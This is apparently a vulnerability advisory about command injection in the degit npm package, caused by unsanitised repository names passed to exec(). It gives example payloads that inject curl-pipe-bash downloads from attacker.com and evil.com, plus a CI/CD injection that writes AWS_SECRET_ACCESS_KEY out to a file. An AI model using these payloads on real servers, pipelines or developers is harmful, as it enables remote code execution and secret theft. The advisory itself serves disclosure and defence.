Command Injection Affecting degit package, versions <2.8.6>=3.0.0 <3.3.1

degit is a Straightforward project scaffolding

Affected versions of this package are vulnerable to Command Injection due to improper sanitisation of user input for git shell commands directly invoked with exec() method by _cloneWithGit() and fetchRefs() functions. An attacker can execute arbitrary operating system commands as the process user by supplying a specially crafted git repository name.

1. Web-Based Project Scaffolding:

• user input: github.com/user$(curl${IFS}https://attacker.com/shell.sh|bash)/repo

• server-side call: degit("github.com/user$(curl${IFS}...)/repo").clone("/tmp/project")

• result: shell.sh executes on the server with the web server's privileges

2. CI/CD Pipeline Injection

# .github/workflows/scaffold.yml
- name: Scaffold project
  run: |
    npx degit "${{ github.event.inputs.template }}" ./project

with attacker-controlled template input (e.g., from a PR or workflow dispatch):

github.com/user$(printenv${IFS}AWS_SECRET_ACCESS_KEY>$GITHUB_WORKSPACE/leak.txt)/repo

3. Developer Machine via Malicious Package:

• A popular npm package that uses degit internally with user-provided template names:

// Inside popular scaffolding CLI:
const template = process.argv[2];   // user provides this
await degit(template).clone(dest);  // injection here

• Attacker publishes a blog post recommending:

npx popular-scaffold-cli "github.com/user$(curl${IFS}https://evil.com/malware|bash)/template"

• GitHub Commit
• GitHub Commit
• GitHub Gist